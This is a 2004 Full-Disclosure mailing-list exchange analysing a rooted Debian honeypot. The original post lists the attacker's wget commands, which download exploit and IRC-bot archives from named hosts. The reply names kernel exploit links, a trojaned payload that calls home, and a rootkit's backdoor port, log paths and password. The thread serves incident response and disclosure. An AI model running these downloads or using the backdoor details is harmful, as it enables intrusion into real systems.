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Re: [Full-Disclosure] Automated ssh scanning

kernel do_brk exploit by isec http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php, this has had some extra payload added, which when runs goes to on port 80 requesting /~telecom69/gov.php which is offline, seems to also mess with some binarys as so is running after reboot, cant see where yet ( kinda confused about that one )

Ptrace/kmod kernel exploit by isec - http://www.k-otik.com/exploits/03.30.kernel.c.php

root kit with backdoor'd ssh listens on port 26000 which replaces smbd binary, loggin of the ssh connections goes to /usr/include/iceconf.h , also has a crappy tcp sniffer which logs to /usr/lib/libice.log,

***** backdoor password for this is ice4budu

emech setup for undernet to join #tty , which there are a bunch of bots in there atm ( maybe 10 )

anyway hope that helps

----- Original Message ----- From: "Richard Verwayen" <holle@xxxxxxx>
To: "FD" <full-disclosure@xxxxxxxxxxxxxxxx>
Sent: Thursday, August 26, 2004 10:32 AM
Subject: [Full-Disclosure] Automated ssh scanning

Hello list!

A few weeks ago there was a discussion about automated ssh scanning with
user/password combinations like guest/guest or admin/admin.
I set up a debian woody fully patched with both accounts activated, and
got rooted some days later...

The attackers installed some software and irc-bots and tried to use this
host for testing other computers, thats not the point. I would like to
know where's the weak point in the system? As the system was updates on
a daily base! The only known weakness were these two accounts!

Here is a list of software the attacker used, maybe someone could bring
a bit light into this tunnel!

wget sky.prohosting.com/awxro/linux/xpl.tar.gz
wget www.bo2k-rulez.net/a
wget www.bo2k-rulez.net/psybnc.tgz
wget www.corbeanu.as.ro/t.gz
wget roarmy.com/god.tgz
wget www.generatiapro.go.ro/fast.tgz


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